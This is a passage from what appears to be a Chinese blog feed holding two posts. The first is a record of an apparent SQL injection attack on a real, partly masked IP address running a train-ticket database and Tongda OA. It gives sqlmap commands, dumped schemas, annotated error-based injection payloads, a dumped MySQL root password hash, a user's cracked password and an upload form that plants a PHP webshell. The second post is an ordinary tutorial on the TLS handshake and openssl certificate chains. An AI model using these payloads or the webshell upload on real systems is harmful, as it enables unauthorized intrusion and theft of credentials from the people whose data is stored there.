class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div></pre></td><td class="code"><pre><div class="line">python sqlmap.py -u <span class="string">"http://211.137.*.*/logincheck.php"</span> --data=<span class="string">"PASSWORD=123456&UNAME=admin%bf'*%23"</span> --tables</div><div class="line"></div><div class="line">web server operating system: Windows</div><div class="line">web application technology: PHP 5.2.10, Apache 2.2.22</div><div class="line">back-end DBMS: MySQL 5.0</div><div class="line">Database: TRAIN</div><div class="line">[5 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| kind |</div><div class="line">| pass |</div><div class="line">| price |</div><div class="line">| station |</div><div class="line">| train |</div><div class="line">+---------------------------------------+</div><div class="line"></div><div class="line">Database: TD_OA</div><div class="line">[204 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| user |</div><div class="line"></div><div class="line">Table: user //登陆用户数据</div><div class="line">[77 columns]</div><div class="line">+------------------+------------------+</div><div class="line">| Column | Type |</div><div class="line">+------------------+------------------+</div><div class="line">| ADD_HOME | varchar(200) |</div><div class="line">| AUTHORIZE | int(11) |</div><div class="line">| AVATAR | varchar(20) |</div><div class="line">| BBS_COUNTER | int(11) |</div><div class="line">| BBS_SIGNATURE | text |</div><div class="line">| BIND_IP | text |</div><div class="line">| BIRTHDAY | date |</div><div class="line">| BKGROUND | text |</div><div class="line">| BP_NO | varchar(50) |</div><div class="line">| BYNAME | varchar(20) |</div><div class="line">| CALL_SOUND | char(2) |</div><div class="line">| CANBROADCAST | int(11) |</div><div class="line">| CONCERN_USER | text |</div><div class="line">| DEPT_ID | int(11) |</div><div class="line">| DEPT_ID_OTHER | text |</div><div class="line">| DISABLED | int(11) |</div><div class="line">| DUTY_TYPE | int(11) |</div><div class="line">| EMAIL | varchar(50) |</div><div class="line">| EMAIL_CAPACITY | int(11) |</div><div class="line">| FAX_NO_DEPT | varchar(50) |</div><div class="line">| FOLDER_CAPACITY | int(11) |</div><div class="line">| ICQ_NO | varchar(50) |</div><div class="line">| IS_LUNAR | char(1) |</div><div class="line">| KEY_SN | varchar(100) |</div><div class="line">| LAST_PASS_TIME | datetime |</div><div class="line">| LAST_VISIT_IP | varchar(100) |</div><div class="line">| LAST_VISIT_TIME | datetime |</div><div class="line">| LIMIT_LOGIN | char(1) |</div><div class="line">| MENU_EXPAND | char(2) |</div><div class="line">| MENU_IMAGE | varchar(20) |</div><div class="line">| MENU_TYPE | char(1) |</div><div class="line">| MOBIL_NO | varchar(50) |</div><div class="line">| MOBIL_NO_HIDDEN | char(1) |</div><div class="line">| MOBILE_PS1 | varchar(50) |</div><div class="line">| MOBILE_PS2 | varchar(50) |</div><div class="line">| MOBILE_SP | varchar(50) |</div><div class="line">| MSN | varchar(200) |</div><div class="line">| MY_RSS | text |</div><div class="line">| MY_STATUS | varchar(200) |</div><div class="line">| MYTABLE_LEFT | varchar(200) |</div><div class="line">| MYTABLE_RIGHT | varchar(200) |</div><div class="line">| NICK_NAME | varchar(50) |</div><div class="line">| NOT_LOGIN | varchar(20) |</div><div class="line">| NOT_VIEW_TABLE | varchar(20) |</div><div class="line">| NOT_VIEW_USER | varchar(20) |</div><div class="line">| OICQ_NO | varchar(50) |</div><div class="line">| ON_STATUS | char(1) |</div><div class="line">| ONLINE | int(11) |</div><div class="line">| PANEL | char(1) |</div><div class="line">| PASSWORD | varchar(50) |</div><div class="line">| PIC_ID | int(10) unsigned |</div><div class="line">| POST_DEPT | text |</div><div class="line">| POST_NO_HOME | varchar(50) |</div><div class="line">| POST_PRIV | varchar(50) |</div><div class="line">| REMARK | text |</div><div class="line">| SCORE | int(11) |</div><div class="line">| SECURE_KEY_SN | varchar(20) |</div><div class="line">| SEX | char(1) |</div><div class="line">| SHORTCUT | text |</div><div class="line">| SHOW_RSS | char(1) |</div><div class="line">| SMS_ON | char(1) |</div><div class="line">| TDER_FLAG | char(1) |</div><div class="line">| TEL_NO_DEPT | varchar(50) |</div><div class="line">| TEL_NO_HOME | varchar(50) |</div><div class="line">| THEME | varchar(10) |</div><div class="line">| UID | int(11) |</div><div class="line">| UIN | int(10) unsigned |</div><div class="line">| USEING_KEY | char(2) |</div><div class="line">| USER_DEFINE | text |</div><div class="line">| USER_ID | varchar(20) |</div><div class="line">| USER_NAME | varchar(200) |</div><div class="line">| USER_NO | int(11) |</div><div class="line">| USER_PRIV | varchar(10) |</div><div class="line">| USER_PRIV_OTHER | text |</div><div class="line">| WEATHER_CITY | varchar(20) |</div><div class="line">| WEBMAIL_CAPACITY | int(11) |</div><div class="line">| WEBMAIL_NUM | int(11) |</div><div class="line">+------------------+------------------+</div><div class="line"></div><div class="line"></div><div class="line">| version |</div><div class="line">| address |</div><div class="line">| address_group |</div><div class="line">| affair |</div><div class="line">| app_config |</div><div class="line">| app_log |</div><div class="line">| attachment_edit |</div><div class="line">| attend_config |</div><div class="line">| attend_duty |</div><div class="line">| attend_evection |</div><div class="line">| attend_holiday |</div><div class="line">| attend_leave |</div><div class="line">| attend_manager |</div><div class="line">| attend_out |</div><div class="line">| bbs_board |</div><div class="line">| bbs_comment |</div><div class="line">| book_info |</div><div class="line">| book_manage |</div><div class="line">| book_manager |</div><div class="line">| book_type |</div><div class="line">| bs_line |</div><div class="line">| calendar |</div><div class="line">| categories_type |</div><div class="line">| censor_data |</div><div class="line">| censor_module |</div><div class="line">| censor_words |</div><div class="line">| chatroom |</div><div class="line">| contact |</div><div class="line">| contract |</div><div class="line">| contract_line |</div><div class="line">| countdown |</div><div class="line">| cp_asset_type |</div><div class="line">| cp_assetcfg |</div><div class="line">| cp_cptl_info |</div><div class="line">| cp_dpct_sub |</div><div class="line">| cp_prcs_prop |</div><div class="line">| customer |</div><div class="line">| department |</div><div class="line">| dept_map |</div><div class="line">| diary |</div><div class="line">| diary_comment |</div><div class="line">| diary_comment_reply |</div><div class="line">| efax_account |</div><div class="line">| efax_receive_box |</div><div class="line">| efax_send_box |</div><div class="line">| email |</div><div class="line">| email_body |</div><div class="line">| email_box |</div><div class="line">| exam_data |</div><div class="line">| exam_flow |</div><div class="line">| exam_paper |</div><div class="line">| exam_quiz |</div><div class="line">| exam_quiz_set |</div><div class="line">| ext_user |</div><div class="line">| field_date |</div><div class="line">| fieldsetting |</div><div class="line">| file_content | //?</div><div class="line">| file_sort |</div><div class="line">| flow_form_type |</div><div class="line">| flow_print_tpl |</div><div class="line">| flow_process |</div><div class="line">| flow_query_tpl |</div><div class="line">| flow_rule |</div><div class="line">| flow_run |</div><div class="line">| flow_run_data |</div><div class="line">| flow_run_feedback |</div><div class="line">| flow_run_log |</div><div class="line">| flow_run_prcs |</div><div class="line">| flow_sort |</div><div class="line">| flow_timer |</div><div class="line">| flow_type |</div><div class="line">| hrms |</div><div class="line">| icqcontact_tb |</div><div class="line">| icqmsgs_tb |</div><div class="line">| icqservermsg_tb |</div><div class="line">| interface |</div><div class="line">| ip_rule |</div><div class="line">| linkman |</div><div class="line">| meeting |</div><div class="line">| meeting_equipment |</div><div class="line">| meeting_room |</div><div class="line">| module_priv |</div><div class="line">| mytable |</div><div class="line">| netchat |</div><div class="line">| netdisk |</div><div class="line">| netmeeting |</div><div class="line">| news |</div><div class="line">| news_comment |</div><div class="line">| notes |</div><div class="line">| notify |</div><div class="line">| oa_faxassign |</div><div class="line">| oa_faxbatch |</div><div class="line">| oa_faxconfig |</div><div class="line">| oa_faxfeecharge |</div><div class="line">| oa_faxfeeline |</div><div class="line">| oa_faxfeeprice |</div><div class="line">| oa_faxlog |</div><div class="line">| oa_faxremotehost |</div><div class="line">| oa_faxs |</div><div class="line">| oa_faxserverconfig |</div><div class="line">| oa_faxspecline |</div><div class="line">| oa_faxtemplates |</div><div class="line">| oa_options |</div><div class="line">| oa_source |</div><div class="line">| oa_source_used |</div><div class="line">| oa_stamps |</div><div class="line">| oc_log |</div><div class="line">| office_products |</div><div class="line">| office_task |</div><div class="line">| office_transhistory |</div><div class="line">| order_line |</div><div class="line">| picture |</div><div class="line">| plan_type |</div><div class="line">| product |</div><div class="line">| proj_bug |</div><div class="line">| proj_comment |</div><div class="line">| proj_cost |</div><div class="line">| proj_file |</div><div class="line">| proj_file_log |</div><div class="line">| proj_file_sort |</div><div class="line">| proj_forum |</div><div class="line">| proj_priv |</div><div class="line">| proj_project |</div><div class="line">| proj_task |</div><div class="line">| proj_task_log |</div><div class="line">| provider |</div><div class="line">| provider_linkman |</div><div class="line">| rms_file |</div><div class="line">| rms_lend |</div><div class="line">| rms_roll |</div><div class="line">| rms_roll_room |</div><div class="line">| rsa_keypair |</div><div class="line">| sal_data |</div><div class="line">| sal_flow |</div><div class="line">| sal_item |</div><div class="line">| sale_history |</div><div class="line">| sale_manager |</div><div class="line">| score_date |</div><div class="line">| score_flow |</div><div class="line">| score_group |</div><div class="line">| score_item |</div><div class="line">| seal |</div><div class="line">| seal_keylic |</div><div class="line">| seal_log |</div><div class="line">| secure_key |</div><div class="line">| service |</div><div class="line">| sms |</div><div class="line">| sms2 |</div><div class="line">| sms2_priv |</div><div class="line">| sms3 |</div><div class="line">| sms_body |</div><div class="line">| supply_history |</div><div class="line">| supply_order |</div><div class="line">| sys_code |</div><div class="line">| sys_function |</div><div class="line">| sys_log |</div><div class="line">| sys_menu |</div><div class="line">| sys_para |</div><div class="line">| task |</div><div class="line">| train_apply |</div><div class="line">| train_appoint_muster |</div><div class="line">| train_assess_data |</div><div class="line">| train_assess_item |</div><div class="line">| train_assess_title |</div><div class="line">| train_courses |</div><div class="line">| train_ctype |</div><div class="line">| train_info |</div><div class="line">| train_mail |</div><div class="line">| train_manager |</div><div class="line">| train_newcourse |</div><div class="line">| train_survey_data |</div><div class="line">| train_survey_item |</div><div class="line">| train_survey_title |</div><div class="line">| train_teachers |</div><div class="line">| train_ttype |</div><div class="line">| uni1 |</div><div class="line">| unit |</div><div class="line">| url |</div><div class="line">| user_group |</div><div class="line">| user_map |</div><div class="line">| user_online |</div><div class="line">| user_priv |</div><div class="line">| vehicle |</div><div class="line">| vehicle_maintenance |</div><div class="line">| vehicle_operator |</div><div class="line">| vehicle_usage |</div><div class="line">| versio1 |</div><div class="line">| vi_flow_run |</div><div class="line">| vi_user |</div><div class="line">| vote_data |</div><div class="line">| vote_item |</div><div class="line">| vote_title |</div><div class="line">| webmail |</div><div class="line">| wiki_ask |</div><div class="line">| wiki_ask_answer |</div><div class="line">| wiki_comment |</div><div class="line">| wiki_info |</div><div class="line">| winexe |</div><div class="line">| word_model |</div><div class="line">| work_detail |</div><div class="line">| work_person |</div><div class="line">| work_plan |</div><div class="line">| zl_file |</div><div class="line">+---------------------------------------+</div></pre></td></tr></table></figure>
<p>python sqlmap.py -u “<a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a>“ –data=”PASSWORD=123456&UNAME=admin%bf’*%23” -D TRAIN -T pass –columns</p>
<p>判断列字段个数<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">5821</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,(<span class="keyword">SELECT</span> <span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="number">0x70617373</span> <span class="keyword">AND</span> table_schema=<span class="number">0x545241494e</span>),<span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div></pre></td></tr></table></figure></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">5821</span> <span class="keyword">FROM</span>(</div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(qqqpq,<span class="comment">/*concat函数在连接字符串的时候,只要其中一个是NULL,那么将返回NULL*/</span></div><div class="line">(<span class="keyword">SELECT</span> <span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="string">'pass'</span> <span class="keyword">AND</span> table_schema=<span class="string">'TRAIN'</span>), <span class="comment">/*,获取列个数,如果没有就返回空NULL*/</span></div><div class="line">qzvpq,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="comment">/*floor:函数只返回整数部分,小数部分舍弃*/</span></div><div class="line"><span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x) <span class="keyword">as</span> a<span class="comment">/*这句话的意思是说每个派生出来的表(a)都必须有一个自己的别名*/</span>)#</div><div class="line"><span class="comment">/*</span></div><div class="line"><span class="comment">MySQL 的CAST()和CONVERT()函数可用来获取一个类型的值,并产生另一个类型的值。两者具体的语法如下:</span></div><div class="line"><span class="comment"> CAST(value as type);</span></div><div class="line"><span class="comment"> CONVERT(value, type);</span></div><div class="line"><span class="comment">就是CAST(xxx AS 类型), CONVERT(xxx,类型)。</span></div><div class="line"><span class="comment">*/</span></div></pre></td></tr></table></figure>
<p>爆列名<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">4909</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),</div><div class="line"><span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,</div><div class="line">(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(column_name <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="number">0x70617373</span> <span class="keyword">AND</span> table_schema=<span class="number">0x545241494e</span> <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="comment">/*column_name列名,返回不止一个,用limit限制*/</span></div><div class="line"><span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x </div><div class="line"><span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div><div class="line"><span class="comment">/*SQL MID() 函数用于得到一个字符串的一部分。这个函数被MySQL支持,但不被MS SQL Server和Oracle支持。在SQL Server, Oracle 数据库中,我们可以使用 SQL SUBSTRING函数或者 SQL SUBSTR函数作为替代。*/</span></div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">MID</span>(ColumnName, <span class="keyword">Start</span> [, <span class="keyword">Length</span>])</div><div class="line"><span class="keyword">FROM</span> TableName</div></pre></td></tr></table></figure></p>
<p>–password 当前用户密码<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">7241</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> mysql.user <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div></pre></td></tr></table></figure></p>
<p>current user: ‘root@127.0.0.1’<br>*91AF99F23C3D4ED85140D100433725DFA52BECEE</p>
<p>注入出的用户密码<br>张* $1$772.CR0.$dlecp6h5kiOsrVX6Id2BY1 ==> md5(unix) 594188</p>
<h4 id="GETSHELL"><a href="#GETSHELL" class="headerlink" title="GETSHELL"></a>GETSHELL</h4><p>通达OA后台getshell<br><a href="http://www.doc88.com/p-1334628630199.html" target="_blank" rel="external">http://www.doc88.com/p-1334628630199.html</a></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">form</span> <span class="attr">id</span>=<span class="string">"frmUpload"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span></span></div><div class="line"><span class="tag"><span class="attr">action</span>=<span class="string">"http://211.137.*.*/general/vmeet/privateUpload.php?fileName=555.php+"</span> <span class="attr">method</span>=<span class="string">"post"</span>></span></div><div class="line">Upload a new file:<span class="tag"><<span class="name">br</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"Filedata"</span> <span class="attr">size</span>=<span class="string">"50"</span>></span><span class="tag"><<span class="name">br</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Upload"</span>></span></div><div class="line"><span class="tag"><<span class="name">!–</span> <span class="attr">http:</span>//<span class="attr">192.168.56.139</span>/<span class="attr">general</span>/<span class="attr">vmeet</span>/<span class="attr">upload</span>/<span class="attr">temp</span>/<span class="attr">555.php.111</span> 这里是上传之后的网马–></span></div><div class="line"><span class="tag"></<span class="name">form</span>></span></div></pre></td></tr></table></figure>
]]></content>
</entry>
<entry>
<title><![CDATA[SSL协议]]></title>
<url>/2015/04/08/SSL/</url>
<content type="html"><![CDATA[<p>术语:<br>SSL (Secure Socket Layer)安全套接字层协议<br>TLS (Transport Layer Security)传输层安全协议</p>
<h3 id="TLS协议"><a href="#TLS协议" class="headerlink" title="TLS协议"></a>TLS协议</h3><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/keyless-comic-v1.gif" alt=""></p>
<p>第一步,爱丽丝给出协议版本号、一个客户端生成的随机数(Client random),以及客户端支持的加密方法。<br>第二步,鲍勃确认双方使用的加密方法,并给出数字证书、以及一个服务器生成的随机数(Server random)。<br>第三步,爱丽丝确认数字证书有效,然后生成一个新的随机数(Premaster secret),并使用数字证书中的公钥,加密这个随机数,发给鲍勃。<br>第四步,鲍勃使用自己的私钥,获取爱丽丝发来的随机数(即Premaster secret)。<br>第五步,爱丽丝和鲍勃根据约定的加密方法,使用前面的三个随机数,生成”对话密钥”(session key),用来加密接下来的整个对话过程。</p>
<p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_rsa.jpg" alt=""></p>
<p>Tip:<br>1,生成对话密钥一共需要三个随机数,第三个发出的随机数是用服务端公钥加密的,除了客户端知道和服务端能解密出来外其他人不知道。<br>2,握手之后的对话使用”对话密钥”加密(对称加密),服务器的公钥和私钥只用于加密和解密”premaster secret”(非对称加密),无其他作用。<br>3,服务器公钥放在服务器的数字证书之中。</p>
<p>Diffie-Hellman</p>
<p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_diffie_hellman.jpg" alt=""></p>
<p>curl -k <a href="https://www.baidu.com/img/baidu_jgylogo3.gif" target="_blank" rel="external">https://www.baidu.com/img/baidu_jgylogo3.gif</a></p>
<p>Wireshark</p>
<p>192.168.1.5 180.97.33.107 SSL Client Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Server Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Certificate, Server Key Exchange(服务端DH参数), Server Hello Done<br>192.168.1.5 180.97.33.107 TLSv1.2 Client Key Exchange(客户端DH参数), Change Cipher Spec, Encrypted Handshake Message<br>180.97.33.107 192.168.1.5 TLSv1.2 Change Cipher Spec, Encrypted Handshake Message</p>
<p>Curl -v 显示交互过程</p>
<p>* TLSv1.2 (OUT), TLS handshake, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Server hello (2):<br>* NPN, negotiated HTTP1.1<br>* TLSv1.2 (IN), TLS handshake, Certificate (11):<br>* TLSv1.2 (IN), TLS handshake, Server key exchange (12):<br>* TLSv1.2 (IN), TLS handshake, Server finished (14):<br>* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):<br>* TLSv1.2 (OUT), TLS change cipher, Client hello (1):<br>* TLSv1.2 (OUT), TLS handshake, Unknown (67):<br>* TLSv1.2 (OUT), TLS handshake, Finished (20):<br>* TLSv1.2 (IN), TLS change cipher, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Finished (20):<br>* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256</p>
<a id="more"></a>
<h3 id="证书生成"><a href="#证书生成" class="headerlink" title="证书生成"></a>证书生成</h3><p>openssl参数解析</p>
<p>-new:创建一个证书请求文件<br>-config<br>-extfile<br>-subj</p>
<p>1,自签名证书</p>
<p>生成私钥<br><code>openssl genrsa -des3 -out server.key 4096</code></p>
<p>去除key口令<br><code>openssl rsa -in server.key -out nokey_server.key</code></p>
<p>生成CSR<br><code>openssl req -new -key server.key -out server.csr -config openssl.cfg -subj "/C=CN/ST=SC/L=CD/O=CerTest/OU=CerTest/CN=www.mytest.com"</code></p>
<p>CN = baidu.com 通用名称<br>O = BeiJing Baidu Netcom Science Technology Co., Ltd 组织单位<br>OU = service operation department. 部门<br>L = beijing 城市<br>ST = beijing 省/州名<br>C = CN 国家/地区</p>
<p>生成自签名证书<br><code>openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt</code></p>
<blockquote>
<p>openssl生成私钥,通过私钥生成证书请求csr。权威证书机构通过证书请求文件给你生成cer证书。但自建CA可为自己的请求签发证书,当然这是不可信的。当将CA导入本地计算机“受信任的根证书颁发机构”后便认为该证书是可信的了。</p>
</blockquote>
<p>2,自建CA签发证书</p>
<p>Step1:生成根CA</p>
<p>a) 生成私钥ca.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out ca.key 4096</code></p>
<p>b) 生成证书签名请求文件ca.csr<br><code>openssl req -new -key ca.key -out ca.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Root CA"</code></p>
<blockquote>
<p>openssl ca 伪命令会自动去找环境变量中的openssl.cfg配置文件</p>
</blockquote>
<p>c) 使用CA私钥自签发根证书<br><code>openssl x509 -req -days 3650 -sha256 -signkey ca.key -in ca.csr -extfile ca.cnf -extensions v3_ca -out ca.cer</code></p>
<p>ca.cnf配置文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line">basicConstraints = CA:true</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p>
<p>Step2:生成中间证书</p>
<p>a) 生成私钥inter.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out inter.key 4096</code></p>
<p>b) 生成中级证书请求文件inter.csr<br><code>openssl req -new -key inter.key -out inter.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Intermedia CA"</code></p>
<p>c) 使用CA根证书签发中间证书inter.cer,该证书可以继续签发服务器证书。<br><code>openssl x509 -req -days 3650 -CAkey ca.key -CA ca.cer -in inter.csr -CAcreateserial -extfile inter.cnf -extensions v3_ca -out inter.cer</code></p>
<p>inter.cnf配置文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"></div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line"># 中间证书需添加,pathlen:0</div><div class="line">basicConstraints = CA:true,pathlen:0</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p>
<p>Step3:生成服务端证书请求文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">openssl genrsa -aes256 -passout pass:123456 -out server.key 4096</div><div class="line">openssl req -new -key server.key -out server.csr -subj "/O=CerTest/OU=Test Certificate Authority/CN=*.mytestx.com"</div></pre></td></tr></table></figure>
<p>Step3:用中间证书签发服务器证书<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">openssl x509 -req -days 365 -sha256 -CA inter.cer -CAkey inter.key -extfile server.cnf -extensions v3_req -CAcreateserial -in server.csr -out server.cer</div></pre></td></tr></table></figure></p>
<p>server.cnf配置文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[ v3_req ]</div><div class="line"># Extensions to add to a certificate request</div><div class="line">basicConstraints = CA:FALSE</div><div class="line">keyUsage = nonRepudiation, digitalSignature, keyEncipherment</div><div class="line">nsCertType = server</div><div class="line">subjectAltName = @alt_names</div><div class="line"></div><div class="line">[ alt_names ]</div><div class="line"># 解决浏览器报错 NET::ERR_CERT_COMMON_NAME_INVALID</div><div class="line">DNS.1 = *.mytestx.com</div><div class="line">DNS.2 = mytestx.com</div></pre></td></tr></table></figure></p>
<blockquote>
<p>分别将ca.cer、inter.cer导入本地受信任的根证书颁发机构和中间证书颁发机构中。导入ca.cer后查看inter.cer显示是受信任了,再次导入中间证书server.cer才能被计算机信任。</p>
</blockquote>